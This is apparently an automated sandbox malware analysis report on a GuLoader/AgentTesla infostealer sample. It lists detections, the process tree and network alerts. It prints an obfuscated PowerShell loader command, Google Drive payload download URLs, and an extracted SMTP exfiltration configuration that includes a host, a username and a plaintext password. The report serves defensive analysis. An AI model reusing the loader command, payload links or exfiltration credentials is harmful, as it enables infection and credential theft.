Edit tour

Windows Analysis Report
ulf4JrCRk2.exe

Overview

General Information

Sample name:	ulf4JrCRk2.exe renamed because original name is a hash value
Original sample name:	26d13e127041233e0a01a631c489b05b175a3c91a2cb2bf289a4188d483d317c.exe
Analysis ID:	1549408
MD5:	a8a9f68888009bf9737238846f3b6ec3
SHA1:	328fc40462eca7d498bfe67b17a01a1ff009796b
SHA256:	26d13e127041233e0a01a631c489b05b175a3c91a2cb2bf289a4188d483d317c
Tags:	exeuser-adrian__luca
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected GuLoader

AI detected suspicious sample

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queues an APC in another process (thread injection)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Msiexec Initiated Connection

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

ulf4JrCRk2.exe (PID: 3868 cmdline: "C:\Users\user\Desktop\ulf4JrCRk2.exe" MD5: A8A9F68888009BF9737238846F3B6EC3)

powershell.exe (PID: 2804 cmdline: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 764 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.santonswitchgears.com", "Username": "tech1@santonswitchgears.com", "Password": "   cJPF@$I3   "}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.2626602783.0000000023CED000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2626602783.0000000023CC4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2626602783.0000000023CC4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.1569897869.000000000A302000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 764	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 764	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 1 entries

Sigma Signatures

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DesusertionIp: 216.58.206.46, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 764, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49879

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DesusertionIp: 208.91.199.223, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 764, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49933

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ", CommandLine: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ulf4JrCRk2.exe", ParentImage: C:\Users\user\Desktop\ulf4JrCRk2.exe, ParentProcessId: 3868, ParentProcessName: ulf4JrCRk2.exe, ProcessCommandLine: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ", ProcessId: 2804, ProcessName: powershell.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T16:10:05.747802+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.9	49795	TCP
2024-11-05T16:10:43.237145+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.9	49977	TCP

ET MALWARE AgentTesla Exfil Via SMTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T16:09:44.203457+0100	2030171	1	A Network Trojan was detected	192.168.2.9	49933	208.91.199.223	587	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T16:10:30.808031+0100	2855542	1	A Network Trojan was detected	192.168.2.9	49933	208.91.199.223	587	TCP

ETPRO MALWARE Agent Tesla Exfil via SMTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T16:10:30.808031+0100	2855245	1	A Network Trojan was detected	192.168.2.9	49933	208.91.199.223	587	TCP

ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T16:09:44.203457+0100	2840032	1	A Network Trojan was detected	192.168.2.9	49933	208.91.199.223	587	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: powershell.exe.2804.2.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.santonswitchgears.com", "Username": "tech1@santonswitchgears.com", "Password": " cJPF@$I3 "}

Multi AV Scanner detection for submitted file

Source: ulf4JrCRk2.exe

ReversingLabs: Detection: 15%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: ulf4JrCRk2.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.9:49879 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.9:49889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:49913 version: TLS 1.2

Source: ulf4JrCRk2.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb54= source: powershell.exe, 00000002.00000002.1562020960.0000000007185000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: re.pdbKN source: powershell.exe, 00000002.00000002.1568722465.0000000008453000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Core.pdb! source: powershell.exe, 00000002.00000002.1568722465.0000000008453000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.1562020960.0000000007185000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Code function: 0_2_00402645 FindFirstFileA,	0_2_00402645
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Code function: 0_2_00405FF5 FindFirstFileA,FindClose,	0_2_00405FF5
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Code function: 0_2_004055B1 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004055B1

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.9:49933 -> 208.91.199.223:587
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49933 -> 208.91.199.223:587
Source: Network traffic	Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.9:49933 -> 208.91.199.223:587
Source: Network traffic	Suricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.9:49933 -> 208.91.199.223:587

Source: global traffic

TCP traffic: 192.168.2.9:49933 -> 208.91.199.223:587

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 208.91.199.223 208.91.199.223
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: Joe Sandbox View

ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: ip-api.com

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.9:49795
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.9:49977

Source: global traffic

TCP traffic: 192.168.2.9:49933 -> 208.91.199.223:587

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gAzexzfPzo9JKAkR34weoW4e3MtgO3do HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1gAzexzfPzo9JKAkR34weoW4e3MtgO3do&export=download HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: smtp.santonswitchgears.com

Source: powershell.exe, 00000002.00000002.1555618352.00000000029B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: msiexec.exe, 00000005.00000002.2626602783.0000000023CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: msiexec.exe, 00000005.00000002.2626602783.0000000023CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: ulf4JrCRk2.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: ulf4JrCRk2.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.1559586535.0000000005C47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1556687538.0000000004D36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1556687538.0000000004BE1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2626602783.0000000023C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msiexec.exe, 00000005.00000002.2626602783.0000000023CED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://smtp.santonswitchgears.com
Source: msiexec.exe, 00000005.00000002.2626602783.0000000023CED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: powershell.exe, 00000002.00000002.1556687538.0000000004D36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1556687538.0000000004BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: msiexec.exe, 00000005.00000002.2626602783.0000000023C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: msiexec.exe, 00000005.00000002.2626602783.0000000023C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: msiexec.exe, 00000005.00000002.2626602783.0000000023C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: msiexec.exe, 00000005.00000003.1665700699.00000000083F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1665641488.00000000083F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.1559586535.0000000005C47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1559586535.0000000005C47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1559586535.0000000005C47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000005.00000002.2614911399.00000000083BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000005.00000002.2614911399.000000000837A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2614850172.0000000008320000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gAzexzfPzo9JKAkR34weoW4e3MtgO3do
Source: msiexec.exe, 00000005.00000002.2614911399.00000000083EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000005.00000002.2614911399.00000000083BF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1665700699.00000000083F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1665641488.00000000083F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gAzexzfPzo9JKAkR34weoW4e3MtgO3do&export=download
Source: msiexec.exe, 00000005.00000002.2614911399.00000000083D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gAzexzfPzo9JKAkR34weoW4e3MtgO3do&export=download3-
Source: powershell.exe, 00000002.00000002.1556687538.0000000004D36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1559586535.0000000005C47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000005.00000003.1665700699.00000000083F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1665641488.00000000083F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000005.00000003.1665700699.00000000083F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1665641488.00000000083F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000005.00000003.1665700699.00000000083F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1665641488.00000000083F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000005.00000003.1665700699.00000000083F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1665641488.00000000083F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000005.00000003.1665700699.00000000083F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1665641488.00000000083F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889

Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.9:49879 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.9:49889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:49913 version: TLS 1.2

Source: C:\Users\user\Desktop\ulf4JrCRk2.exe

Code function: 0_2_0040511A GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040511A

Source: C:\Users\user\Desktop\ulf4JrCRk2.exe

Code function: 0_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_00403217

Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Code function: 0_2_00404959	0_2_00404959
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Code function: 0_2_004062CB	0_2_004062CB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0456E3E0	2_2_0456E3E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_02E3E758	5_2_02E3E758
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_02E34AC0	5_2_02E34AC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_02E3D770	5_2_02E3D770
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_02E341F0	5_2_02E341F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_02E33EA8	5_2_02E33EA8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_26ABE828	5_2_26ABE828
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_26AB59D8	5_2_26AB59D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_26ABAC98	5_2_26ABAC98
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_26AB8EF0	5_2_26AB8EF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_26AB0040	5_2_26AB0040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_26AB87D8	5_2_26AB87D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_26AB3300	5_2_26AB3300
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_26ABB378	5_2_26ABB378
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_26AB0011	5_2_26AB0011

Source: ulf4JrCRk2.exe

Static PE information: invalid certificate

Source: ulf4JrCRk2.exe, 00000000.00000000.1345172785.0000000000447000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamedracma afsoner.exeN vs ulf4JrCRk2.exe
Source: ulf4JrCRk2.exe	Binary or memory string: OriginalFilenamedracma afsoner.exeN vs ulf4JrCRk2.exe

Source: ulf4JrCRk2.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@17/11@5/5

Source: C:\Users\user\Desktop\ulf4JrCRk2.exe

Code function: 0_2_0040442A GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_0040442A

Source: C:\Users\user\Desktop\ulf4JrCRk2.exe

Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,

0_2_00402036

Source: C:\Users\user\Desktop\ulf4JrCRk2.exe

File created: C:\Users\user\AppData\Roaming\supersystem

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6824:120:WilError_03

Source: C:\Users\user\Desktop\ulf4JrCRk2.exe

File created: C:\Users\user\AppData\Local\Temp\nsk335C.tmp

Jump to behavior

Source: ulf4JrCRk2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\ulf4JrCRk2.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ulf4JrCRk2.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ulf4JrCRk2.exe

ReversingLabs: Detection: 15%

Source: C:\Users\user\Desktop\ulf4JrCRk2.exe

File read: C:\Users\user\Desktop\ulf4JrCRk2.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ulf4JrCRk2.exe "C:\Users\user\Desktop\ulf4JrCRk2.exe"
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Section loaded: apphelp.dll	Jump to behavior
